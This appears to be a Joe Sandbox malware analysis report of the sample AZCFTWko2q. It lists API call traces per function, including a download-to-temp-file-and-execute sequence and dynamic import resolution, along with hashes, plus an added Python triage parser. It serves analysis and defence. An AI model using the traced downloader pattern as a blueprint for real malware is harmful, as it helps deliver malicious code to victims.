• Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
• Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
• Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2C7E
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024C2C94
• GetTempPathW.KERNEL32(00000105,?), ref: 024C2CB0
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024C2CC6
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024C2CFF
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024C2D3B
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024C2D58
• ShellExecuteExW.SHELL32(?), ref: 024C2DCF
• WaitForSingleObject.KERNEL32(?,00008000), ref: 024C2DE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: <
• API String ID: 838076374-4251816714
• Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction ID: aa654bc57c3ad7445d99552aaf86822b21a08c106210855fbb8089566405b2b8
• Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction Fuzzy Hash: 394160B590021DAEEB20DF649C85FEA77BCFF15705F1080EAA545A2150DFB09E858FA4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                                      • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                                      • Instruction ID: 9c71dfb5babe54993bf6a7492855afb1ee1096368b068bb90988fde5d929ad68
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68218EB1908711BFE7106FB49C0CA5ABFA8EF05B16F004A2BF555E7601CBBC94418FA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                                      • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                                      • Instruction ID: 73fb14bf46affd44553376bb7457c92806cb5da7ee928c3ed9e21d26ebe8384a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A218EB1908711BFE7106FA49C0CA5ABBECEF05B16F004A2BF555E7601CBBC94418BA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID: kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                                      • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c0b1af4cbb45f53d4af35301b3a4d0a01a6ffc55bc56d525216210f7e756bb0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 881182759003117FE711BB75AC7DE6B7BACEE05B12720052BFC01E3292EBB9D5018A69
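The advapi32.dll and kernel32.dll records above share one shape: a module load (LoadLibraryExW with dwFlags 00000800, which is LOAD_LIBRARY_SEARCH_SYSTEM32, retried as plain LoadLibraryW after a GetLastError check; or GetModuleHandleW) followed by a run of GetProcAddress calls, which is what the "Contains functionality to dynamically determine API calls" signature keys on. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses function records in the "APIs" listing format visible on this page, decodes the LoadLibraryExW flag word, and flags records that resolve imports at run time. The record boundary (a bare "APIs" line), the summary field names and the sample listing (API lines copied from this page into a constructed string) are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox function records (added example, not report tooling).

Parses the "APIs" listings, decodes LoadLibraryExW dwFlags and flags functions
that resolve imports at run time: a LoadLibrary*/GetModuleHandle* call followed
by one or more GetProcAddress calls in the same record.
"""
import re
from dataclasses import dataclass

# Constructed sample: API lines copied from the function records on this page.
# A bare "APIs" line is assumed to start a new function record.
SAMPLE_REPORT = """\
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
• GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
• GetProcAddress.KERNEL32(00000000), ref: 024D2507
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
• GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
• DuplicateHandle.KERNEL32(00000000), ref: 00419779
"""

# Subset of the documented LoadLibraryExW dwFlags values (WinBase.h).
LOAD_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x00000200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x00000400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x00001000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}

# One API line: "• Name.MODULE(args), ref: ADDR"; CRT entries such as
# "__CxxThrowException@8.LIBVCRUNTIME ref: ..." carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW", "GetModuleHandleExA", "GetModuleHandleExW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


def parse_records(report: str) -> list:
    """Split the listing into per-function records, each a list of ApiCall."""
    records, current = [], None
    for line in report.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref")))
    return records


def decode_load_flags(value: int) -> list:
    """Name the known bits of a LoadLibraryExW dwFlags word; keep unknown bits as hex."""
    names = [name for bit, name in LOAD_FLAGS.items() if value & bit]
    unknown = value & ~sum(LOAD_FLAGS)
    if unknown:
        names.append(f"0x{unknown:08X}")
    return names


def summarize(records: list) -> list:
    """Per record: modules loaded, decoded flags, Ex-then-plain retries, GetProcAddress count."""
    out = []
    for calls in records:
        modules, flags, fallback, seen_ex = [], {}, [], set()
        for c in calls:
            if c.api in LOADERS and c.args and c.args[0].lower().endswith(".dll"):
                name = c.args[0].lower()
                if name not in modules:
                    modules.append(name)
                if c.api.startswith("LoadLibraryEx") and len(c.args) >= 3 and c.args[2] != "?":
                    flags[name] = decode_load_flags(int(c.args[2], 16))
                    seen_ex.add(name)
                elif c.api in ("LoadLibraryA", "LoadLibraryW") and name in seen_ex:
                    fallback.append(name)  # plain LoadLibrary retried after the Ex variant
        gpa = sum(1 for c in calls if c.api == "GetProcAddress")
        out.append({
            "first_ref": calls[0].ref if calls else None,
            "modules": modules,
            "load_flags": flags,
            "fallback_load": fallback,
            "getprocaddress": gpa,
            "dynamic_resolution": bool(modules) and gpa > 0,
        })
    return out


if __name__ == "__main__":
    for summary in summarize(parse_records(SAMPLE_REPORT)):
        print(summary)
```

Run against the three records in the sample, the first two are reported as dynamic resolution (advapi32.dll with LOAD_LIBRARY_SEARCH_SYSTEM32 and a plain LoadLibraryW retry, kernel32.dll via GetModuleHandleW) and the third is not; pointing the parser at a full function export gives a quick list of candidate import-resolution stubs to open in the disassembler.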
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
  • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
• __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID: pContext$switchState
• API String ID: 3151764488-2660820399
• Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
• Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
• Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
• GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
• DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                                      • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                                        • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                                        • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: eventObject
                                                                                                                                                                                                                                                                                      • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                                      • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                                      • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 024E0C36
                                                                                                                                                                                                                                                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024E0C9D
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024E0CBA
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024E0D20
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024E0D35
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024E0D47
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024E0D75
                                                                                                                                                                                                                                                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024E0D80
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E0DAC
                                                                                                                                                                                                                                                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024E0DBC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                                      • Instruction ID: 068c6d76c028913e8500f7a1a7223212d1b0cd20cf8b446a062c3265e314c682
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A341B330A042049BEF19FFA6C564BED77A6AF01305F1450AFD8177B282CBB59A09CF61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2061
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F206D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2078
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2083
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F208E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2099
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20A4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20AF
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20BA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20C8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction ID: fef946d97ea5793219a416530691ae89fb4231b3207a572331b6c2269a2de75d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE117476600149AFDB91EF56C841CD93FA6EF44750B5140AABA098F221DB71EE609F90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E61
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
• Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
• Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: __cftoe
• String ID: F(@$F(@
• API String ID: 4189289331-2038261262
• Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
• Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
• Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
